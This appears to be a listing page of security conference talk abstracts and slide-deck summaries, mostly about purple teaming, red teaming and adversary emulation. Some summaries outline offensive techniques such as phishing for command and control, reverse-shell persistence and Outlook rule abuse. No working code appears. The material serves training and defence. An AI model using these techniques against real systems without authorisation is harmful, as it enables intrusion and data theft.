The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), those on the Defensive side (blue team), and those mixing the two.
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pinpoint attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This was part of a 3-hour talk for students at a local college. Introduction to post exploitation with PowerShell Empire. Feel free to use and learn from.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector... (Chris Gates)
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expert (ShivamSharma909)
Red Teaming is a tradition of rigorously challenging policies, plans, systems, and assumptions by embracing the adversarial approach. Red teams are independent of the organizations. They are only hired by companies when they decide to check their security policies.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 (beltface)
1. The document discusses building a purple team program by combining knowledge from blue (security) and red (penetration testing) teams. It provides examples of threat modeling, tabletop exercises, and red team exercises performed for two clients.
2. The results and corrective actions from exercises on Client1 are discussed, such as installing Security Onion and Qualys. Building communication and getting management buy-in is advised to start a purple team program.
3. Resources like the Freenode IRC channels #misec and #ladosanostra are provided for learning attack paths and purple team strategies. Doing regular threat modeling, exercises, and assessments is presented as a proactive approach to security.
Going Purple: From full time breaker to part time fixer: 1 year later (Chris Gates)
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets: Red, Blue, and Purple. The talk will hopefully bring value to anyone working in their respective bucket or assist in the creation or continuation of purple teaming at their company.
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017 (Chris Gates)
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable processes. It is extremely rare that a vulnerability causes a direct risk to an environment; it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the defensive teams to measure the environment's resistance to the attacks. We will demonstrate attacks, capabilities, TTP tracking, trending, positive metrics, hunt integration and, most of all, we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team, sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what we have accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca... (MITRE - ATT&CKcon)
Atomic testing involves small, easily executable tests of individual ATT&CK techniques to test security coverage and help defenders learn how adversaries operate. The document recommends scheduling recurring atomic tests, using them to identify gaps, and holding teams and partners accountable. It provides links to the Atomic Red Team project on GitHub and the Atomic Tests website for using, contributing to, and learning more about atomic tests.
5 Tips to Successfully Running a Bug Bounty Program (bugcrowd)
Learn why bug bounties are great tools in application security, why they can be difficult, and how you can utilize them to start finding more critical vulnerabilities.
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
The document discusses the concept of a "Purple Team" which combines the skills and perspectives of both Red Teams (which simulate attacks) and Blue Teams (which defend against attacks). A Purple Team aims to improve security by facilitating cooperation and feedback between offensive and defensive teams. Several scenarios are provided as examples of how a Purple Team could work to help each side improve. The goal is for teams to stop seeing each other as adversaries and instead work together to enhance the security of an organization.
FRSecure 2018 CISSP Mentor Program Session 10 (FRSecure)
This document summarizes key points from a CISSP mentor program session. It discusses responding to signs of compromise during a penetration test, types of tests that can be done without source code access, and the most efficient penetration test approach. It also covers incident response methodology steps, operational preventative and detective controls like IDS/IPS and SIEM, asset management techniques like configuration hardening and vulnerability management.
Applying principles of chaos engineering to serverless (O'Reilly Software Arc... (Yan Cui)
This document summarizes a talk on applying principles of chaos engineering to serverless applications. It discusses defining steady state, injecting realistic failures like latency and errors, and using controlled experiments to build confidence in a system's ability to withstand failures in production. Specifically for serverless, it addresses challenges like smaller units of deployment and many managed services, and demonstrates how to inject latency and errors at different points to test failure handling. The goal is learning from failures, not intentionally breaking systems, so containment is important.
Resistance Isn't Futile: A Practical Approach to Threat Modeling (Katie Nickels)
There are hundreds (if not thousands) of adversary groups out there, and it’s understandable if defenders sometimes feel like resistance is futile. Good news: you don’t have to defend against all of them! Even better news: there’s a simple way you can prioritize which adversaries you focus on and how you defend against them: threat modeling. This presentation will present a simple, practical threat modeling approach that any analyst or defender can use to get started figuring out what threats matter to their organization.
The presentation will start by acknowledging the many approaches to threat modeling that others have created, and then discuss why there’s confusion around it. The presentation will then explain four simple steps and practical actions that anyone can take to get started with threat modeling: know your organization, know your adversaries, match those up, and take action. The audience will leave with an understanding of how threat modeling can help any team prioritize what threats they care about and use that to improve their organization’s defenses.
A look at the types of malicious artifacts from Advanced and Commodity attacks, what unique artifacts to look for, how logging caught them in a Windows environment, and how LOG-MD can help.
MalwareArchaeology.com
LOG-MD.com
More Aim, Less Blame: How to use postmortems to turn failures into something ... (Daniel Kanchev)
Mistakes and failure are inevitable. Instead of being afraid of them, we should use them as lessons that help identify weak points in our organisations and systems. One way to do this is by writing blameless postmortems. Daniel details exactly how postmortems can help organizations and teams focus on improvement, and how that boosts work morale, makes products better, and strengthens your relationship with customers.
Bug bounty programs have existed since the 1990s but have grown significantly in recent years. The document summarizes highlights from 2014 reports of major companies' bug bounty programs including Google, Facebook, Microsoft, Github, and Tesla. It also discusses reasons for organizations to start bounty programs, tips for reducing noise, and trends in bug bounty research like researcher demographics.
2018 FRSecure CISSP Mentor Program Session 8 (FRSecure)
This document summarizes key points from session #8 of a CISSP mentor program. It includes a quiz with multiple choice questions on firewalls, WAN protocols, wireless security protocols, and Bluetooth security. The session also covered access control models and authentication methods, focusing on passwords as a type 1 authentication method involving something you know. Password hashing, dictionary attacks, and brute force attacks were discussed as methods for cracking passwords.
Secrets and Mysteries of Automated Execution Keynote slides (Alan Richardson)
Test Automation, Programming Automation, Automated Execution. This presentation contains some high level models, abstractions and approaches for effective, non-flaky and maintainable automation.
https://www.eviltester.com
Applying principles of chaos engineering to serverless (CodeMesh) (Yan Cui)
Chaos engineering is a discipline that focuses on improving system resilience through experiments that expose the inherent chaos and failure modes in our system, in a controlled fashion, before these failure modes manifest themselves like a wildfire in production and impact our users.
Netflix is undoubtedly the leader in this field, but much of the publicised tools and articles focus on killing EC2 instances, and the efforts in the serverless community have been largely limited to moving those tools into AWS Lambda functions.
But how can we apply the same principles of chaos to a serverless architecture built around AWS Lambda functions?
These serverless architectures have more inherent chaos and complexity than their serverful counterparts, and we have less control over their runtime behaviour. In short, there are far more unknown unknowns with these systems.
Can we adapt existing practices to expose the inherent chaos in these systems? What are the limitations and new challenges that we need to consider?
Red Teaming is hot right now. Many people want to get into it just because it sounds cool. While I tend to agree, there are many things to consider. There is way more to red teaming than just "getting in" to organizations. Join us for this one hour webcast where we cover what red team is, why you may want to be a red teamer, and how to become a red teamer.
Purple teaming involves red and blue teams collaborating to improve cybersecurity. By using red team tactics, blue teams can practice detecting and responding to active threats. This helps validate tools and processes, find gaps in detection and response, and ensure organizations are prepared to handle real-world attacks. It differs from traditional penetration testing by focusing more on detection and response rather than just finding vulnerabilities. The goal is to gain confidence in incident response plans through practical exercises.
Using IOCs to Design and Control Threat Activities During a Red Team Engagement (Joe Vest)
The term Red Team or Red Teaming has become more prevalent in the security industry. Both commercial and government organizations conduct "Red Team Exercises". What does this mean? What is a Red Team engagement? How is it different from other security tests? Isn't current penetration and vulnerability security testing enough?
Red Teaming shares many of the fundamentals of other security testing types, yet focuses on specific scenarios and goals that are used to evaluate and measure an organization's overall security defense posture.
Organizations spend a great deal of time and money on the security of their systems. Red Teams have a unique goal of testing an organization's ability to detect, respond to, and recover from an attack. When properly conducted, Red Team activities can significantly contribute to the improvement of an organization's security controls, help hone defensive capabilities, and measure the effectiveness of security operations.
This presentation introduces the Red Teaming concept of IOC management, how a Red Team operator can use specific IOCs to blend into a target, and how to design specific scenarios to test a Blue Team's defensive posture.
This is the slide deck from a presentation for SecTor 2016.
I spoke with Chris Gates @carnal0wnage.
The outline is:
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
Average computer users are split into two teams, red and blue, to test their offensive and defensive cybersecurity skills. On the first day, the red team attacks the blue team's network by deploying beacons, exploits, and backdoors and taking down services, while the blue team focuses on understanding and hardening their network. On the second day, the roles are reversed and the blue team goes on the offensive to test the skills they learned from defending against attacks. The event provides benefits to both teams in sharpening their skills through hands-on experience.
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Denim Group
You’ve heard of black, white, and gray box testing? Adding to the security color spectrum, Red Teams (pen testers) working together with Blue Teams (defenders) can improve organizational security and get the most out of security assessments. This talk will discuss both general and specific concepts and techniques to improve penetration tests through coordination with internal security teams. We will discuss high-level topics such as knowing what type of assessment is needed for your organization, through to more detailed technical concepts such as detecting attack traffic and coordinating with red team attacks. If your internal security team isn't ready for a pentest, let's discuss steps to get your team prepared and ready to fully take advantage of full-scope penetration tests. From a pentester's perspective, we will discuss the types of testing that are most beneficial to your clients and how to communicate and perform testing activities in conjunction with blue teams. We will also talk about ways to assist the teams with remediation from a third-party point of view.
What are the three key points an audience will receive:
· Pen testing techniques on working with internal security
· Internal security techniques for detecting attacks
· Concepts on performing the best type of pen test for your customers
Pentest Apocalypse - that's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just like how Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only help add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit:- http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Next generation pentest your company cannot buy
Vlad Styran
This document discusses the differences between penetration testing and vulnerability assessments, and identifies issues with how both clients and consultants typically approach penetration testing. It notes that penetration tests are meant to be deeply interactive and aim to achieve specific goals by exploiting vulnerabilities, while vulnerability assessments only identify issues without attempting exploitation. Both clients and consultants are seen as contributing to unsatisfactory penetration tests when clients lack understanding of the purpose and proper scope of tests, and when consultants perform superficial assessments rather than fully interactive tests. The document provides recommendations for improving penetration testing quality, such as clarifying objectives, evaluating consultant qualifications, and considering alternative payment models.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent, making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include e-mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client-side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in Windows environments.
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beau Bullock
Your vulnerability scanner reports that there are no issues on your network. A pentester has spent the last week trying to exploit every system your organization owns with no luck. The check box for this year's compliance audit has been checked. While it is good that these things occurred, they do not complete the picture in regards to true risk.
Real attackers do not solely rely on software exploits to compromise an environment. In almost every breach you hear about, the root of the compromise was a phishing attack. This is why additional, post-infection tests should be performed to assess just how far an attacker can go after gaining a foothold in your environment.
What command and control channels are available for an attacker to utilize to communicate with your internal systems? How easy is it for an attacker to move laterally within your environment and gain access to other systems? What are your detection capabilities when it comes to sensitive data being exfiltrated out of your environment? How do you test these attacker techniques using open-source tools?
This lecture will address these questions and more, including a showcase of attacker methodologies.
The document discusses building a home arcade system. It details three attempts using different hardware configurations - a Raspberry Pi, Windows laptop with Maximus Arcade emulator, and potentially a Windows PC with Hyperspin frontend. The Raspberry Pi setup had issues with exiting games without a keyboard. The Maximus Arcade setup on a laptop worked better out of the box but had video card issues. The goal is to build an easy-to-use system for kids to play retro games.
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
Jorge Orchilles
Deep Dive into Adversary Emulation - Ransomware Edition
This talk covers the Garmin July 2020 hack by a group called Evil Corp that leveraged a newer ransomware called WastedLocker. We cover Cyber Threat Intelligence, creating an adversary emulation plan for ransomware, demo the emulation, and discuss how to defend against these attacks.
8.8 Las Vegas - Adversary Emulation with C2 Matrix
Jorge Orchilles
Keynote from 8.8 Las Vegas 2020: https://www.8dot8.org/8-8-las-vegas/
The presentation is a combination of my presentations from Black Hat 2020 Arsenal - C2 Matrix and DEF CON Red Team Village on Adversary Emulation.
https://twitter.com/jorgeorchilles
Adversary Emulation is a type of Red Team Exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective (similar to those of realistic threats or adversaries). Adversary emulations are performed using a structured approach, which can be based on a kill chain or attack flow. Methodologies and Frameworks for Adversary Emulations are covered. Adversary Emulations are end-to-end attacks against a target organization to obtain a holistic view of the organization’s preparedness for a real, sophisticated attack.
Command and Control is one of the most important tactics in the MITRE ATT&CK matrix as it allows the attacker to interact with the target system and realize their objectives. Organizations leverage Cyber Threat Intelligence to understand their threat model and adversaries that have the intent, opportunity, and capability to attack. Red Team, Blue Team, and virtual Purple Teams work together to understand the adversary Tactics, Techniques, and Procedures to perform adversary emulations and improve detective and preventive controls.
The C2 Matrix was created to aggregate all the Command and Control frameworks publicly available (open-source and commercial) in a single resource to assist teams in testing their own controls through adversary emulations (Red Team or Purple Team Exercises). Phase 1 lists all the Command and Control features such as the coding language used, channels (HTTP, TCP, DNS, SMB, etc.), agents, key exchange, and other operational security features and capabilities. This allows more efficient decision making when called upon to emulate an adversary's TTPs.
It is the golden age of Command and Control (C2) frameworks. Learn how these C2 frameworks work and start testing against your organization to improve detective and preventive controls.
The C2 Matrix currently has 35 command and control frameworks documented in a Google Sheet, web site, and questionnaire format.
https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
https://www.thec2matrix.com/matrix
https://ask.thec2matrix.com/
Learn how Red Teams and Blue Teams work together in virtual Purple Teams
Leverage Cyber Threat Intelligence to understand adversary tactics, techniques, and procedures
Perform adversary emulations in Red or Purple Team Exercises
Choose which command and control to use for the assessment to provide the most value
Measure and improve people, process, and technology
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
jasonjfrank
This document discusses 10 tactics that blue teamers and network defenders can use to test their own security posture by thinking like attackers. It recommends using free, open-source tools like Nmap and PowerShell scripts from the PowerSploit and PowerView toolkits to conduct reconnaissance on the network to discover assets, analyze systems for common privilege escalation vectors, find open file shares, map domain trust relationships, audit passwords and account configurations, and test the ability to exfiltrate data past network boundaries. The goal is to help blue teams validate their defenses by demonstrating the same techniques attackers might use with minimal network disruption.
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Mauricio Velazco
Demo 1: https://www.youtube.com/watch?v=cpnrCkj1308
Demo 2: https://www.youtube.com/watch?v=JmtjtiI3-fc
Demo 2 1/2: https://www.youtube.com/watch?v=KRdNbYbJSiI
Demo 3: https://www.youtube.com/watch?v=6gB-upKXTZ4
Automated adversary simulation is often perceived as a hard, dangerous and complicated program to implement and run. Fear no longer, our methodology and tooling will let you test and measure your defenses throughout your production environment to test not only your detection rule’s resilience but the whole event pipeline as well as your team’s response procedures. In this talk, we’ll share with the audience the open source tools we built and the methodology we use that will allow them to hit the ground running at nearly no cost.
WirSindOhana24 - Monitor your Salesforce orgs with open-source only!
Nicolas Vuillamy
Panic, the Salesforce production org is down! But it was working perfectly fine yesterday, what happened? What if you had access to daily monitoring of all your org metadata configuration, to see the detailed differences since yesterday? What if you could install and schedule it in 5 minutes per org? What if it was provided by free and open-source tools? What if it contained additional checks like Apex and Flows quality health, suspicious user activity, analysis of the consistency between object model and permission sets, detection of deprecated API version usage, detection of unused flows, and many extra features? What if the check results could be sent as Slack notifications? Let us show you how with a live demo!
This document discusses ethical hacking and provides information on various types of hackers, why people hack, and the hacking process. It defines ethical hacking as legal hacking done with permission to identify vulnerabilities. The hacking process involves preparation, footprinting, enumeration and fingerprinting, vulnerability identification, gaining access, escalating privileges, covering tracks, and creating backdoors. It also discusses how to protect systems and what to do if hacked, such as restoring from backups and patching security holes.
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building and testing detection capabilities will be a challenging task.
PurpleSharp is an open-source adversary simulation tool written in C# that executes adversary techniques against Windows environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection program. PurpleSharp executes different behavior across the attack lifecycle following the MITRE ATT&CK Framework’s tactics: execution, persistence, privilege escalation, credential access, lateral movement, etc.
These are the slides from my "Active Defense - Helping threat actors hack themselves!" presentation at the BSides Columbus Information Security Conference on 03/02/2018 in Columbus, Ohio.
The document discusses the stages of a network attack from an attacker's perspective. It describes how attackers first perform reconnaissance to gather information about a target network such as open ports, services and vulnerabilities. It then discusses how attackers use this information to directly attack systems using exploits or malware. Finally, it mentions how attackers aim to maintain access and cover their tracks after gaining entry. The goal is to provide an overview of the attack process and challenges for network defense.
This document discusses tactics for red team operations on Windows networks. It begins by covering techniques for gaining initial access and situational awareness, such as using PowerShell commands to enumerate users, computers, and network information. It then discusses abusing domain trust relationships and using PowerView to operate across trusts. Escalation techniques like PowerUp for privilege escalation and Mimikatz for token manipulation are also covered. The document discusses persistence methods like Golden Tickets and WMI. It finally covers techniques for locating and accessing file shares to retrieve sensitive information, using PowerView commands. The overall message is that while tactics remain the same, tools and implementations are continually evolving to facilitate red team operations.
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
Presented at the inaugural SANS Purple Team Summit & Training event, this presentation covers performing a high value adversary emulation exercise in a purple team fashion (red and blue team sitting together throughout the entire engagement).
This talk will introduce a relatively new concept in Threat Hunting by explaining how external threat hunters use similar techniques to Red teamers to create a repeatable hunting model through the use of an intermediary payload system to provide insight, awareness, and action.
David Maynor, @Dave_Maynor, Black Lotus Labs Analysis Lead, Centurylink
Jorge Orchilles, @jorgeorchilles, CTO, SCYTHE
Platform Security IRL: Busting Buzzwords & Building Better
Equal Experts
Practical tips and heroic war stories on how to secure a large, modern, fast software delivery platform. From building a team to building cool stuff, dealing with organisational setups to dealing with security incidents.
Zero Buzzwords Guaranteed.
Chris Rutter has spent the last few years obsessed with making security, engineering and the business work together. Starting his career as an engineer, he uses a deep understanding of Agile, DevOps, and product delivery to solve security problems in a way that enables teams, rather than hitting them with bricks.
At PHP Meetup 011, held on Saturday, the topic was WordPress. Doruk Fişek and I gave a joint presentation. I covered the WordPress Security side and he covered the WordPress Server Security side. You can reach my presentation via the SlideShare link below.
2023 NCIT: Introduction to Intrusion Detection
APNIC
APNIC Senior Security Specialist Adli Wahid presents an Introduction to Intrusion Detection at the 2023 NCIT, held in Suva, Fiji from 17 to 18 August 2023.
Introduction to Just in Time Access - BrightTalk
Haydn Johnson
Ensuring users have access to only the resources they need, aka least privilege, is great. But have you considered granting users access only when they need it?
This talk will introduce the concept of granting ‘Just-in-Time Access’. Securing an endpoint is more than patching and vulnerability management. Granting access to who, when and what also secures an endpoint. Only when a user needs to connect to a system, can access be granted. Ports such as SSH do not need to be open for the world to connect and probe. Database credentials do not need to last forever.
This approach limits the damage that can be caused by an account -- privileged or otherwise -- by reducing the amount of time an attacker has to gain access to the account, as well as the time they have to move from a compromised account before losing access.
The short explanation of Just-in-Time Access is providing short-term access in real time. It is a relatively new term in the industry and is another way to practice the least-privilege best practice.
Key Takeaways:
• The benefits to Just-in-Time access for security and operations
o Improved visibility
o Minimize damage from compromised accounts
o Operational efficiency
• How SSH can be replaced with AWS SSM sessions
o Direct SSH replacement
o SSH reverse proxy
• How Just in Time Access for database credentials can help
o Example: Hashicorp Vault
o Example: Akeyless
• Resources for learning more
Communication to the business is very different to exploitation. This talk helps bridge the gap between a finding and a business risk.
Presented at HackFest 2018
Human(e) Security in a World of Business 2018
Haydn Johnson
Relationship Building in Security is extremely important.
Understand where I came from, where I am at, struggles I had and things I found work to help improve the security posture of my organization.
This document outlines how to conduct Purple Team exercises using the Cyber Kill Chain and Extended Cyber Kill Chain frameworks. It discusses:
- Terminology related to purple teaming, red teaming, and blue teaming.
- The purple team process of conducting focused penetration testing with clear training objectives for the blue team.
- The Cyber Kill Chain and Extended Cyber Kill Chain models and how they can be used for exercises.
- Other frameworks like ATT&CK that can aid exercises.
- The different phases and teams involved in cyber exercises.
- Examples of exercises that could be done using various tools and techniques mapped to the kill chains, like port scanning with Nmap and collecting credentials with Mim
Purple Teaming is the idea of using a Red Team exercise with clear training objectives for the Blue Team.
Great exercises should not just be focused on testing a product, they should also test your active Blue Team members and their skills. But how does one start to think about a Purple Team exercise, how does one go about running one and what does it look like?
In this talk we will explain the what, why and how of planning an effective purple team exercise and give some examples. Most enterprise networks are Windows heavy, so examples will lean heavily on this.
Testing assumptions, gaps and blind spots is what being proactive is all about. This talk is both for the console folks and non-console folks.
Phishing for clicks is like the VA portion of a pentest. It feels nice being a hacker, but that fuzzy feeling wears off quickly once you learn about command and control.
Everyone knows in theory what phishing is and what phishing emails look like; they may even know in theory how it all works.
What about executing a Phishing campaign? This talk will show you the journey of setting up and executing a Phishing campaign to gain command and control. I have tried a few frameworks, coded some pages myself and will show the way I learned to Phish.
This is not just about sending an email and a link, this is about bypassing the email minefield to get the email to the target and having the payload call back out of the network.
We will go through:
Choosing and setting up a Phishing Framework
Cloning a site
Testing delivery and bypassing spam filters with a payload (ClickOnce)
Testing different user interactions for executing payloads
Learning different payloads for command and control
This report is to explain some key commands within Meterpreter that allow you to have some sort of situational awareness. That is, how to gain more insight into system information, the user you currently are and what processes are running among other things.
This document provides a step-by-step guide to creating persistence with PowerSploit and the Veil Framework. It begins by using Veil-Evasion to generate a reverse Meterpreter payload, then extracts the base64 encoded payload to use in a PowerSploit persistence script. PowerSploit is used to generate a persistence script that will execute the payload and send a reverse shell to the attacker whenever a user logs into the victim machine. It also provides an alternative manual method using PowerShell commands directly without the PowerSploit script.
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able to lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
The UiPath Test Automation with generative AI and OpenAI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, as a test automation solution, with OpenAI's advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/building-and-scaling-ai-applications-with-the-nx-ai-manager-a-presentation-from-network-optix/
Robin van Emden, Senior Director of Data Science at Network Optix, presents the “Building and Scaling AI Applications with the Nx AI Manager,” tutorial at the May 2024 Embedded Vision Summit.
In this presentation, van Emden covers the basics of scaling edge AI solutions using the Nx tool kit. He emphasizes the process of developing AI models and deploying them globally. He also showcases the conversion of AI models and the creation of effective edge AI pipelines, with a focus on pre-processing, model conversion, selecting the appropriate inference engine for the target hardware and post-processing.
van Emden shows how Nx can simplify the developer’s life and facilitate a rapid transition from concept to production-ready applications. He provides valuable insights into developing scalable and efficient edge AI solutions, with a strong focus on practical implementation.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
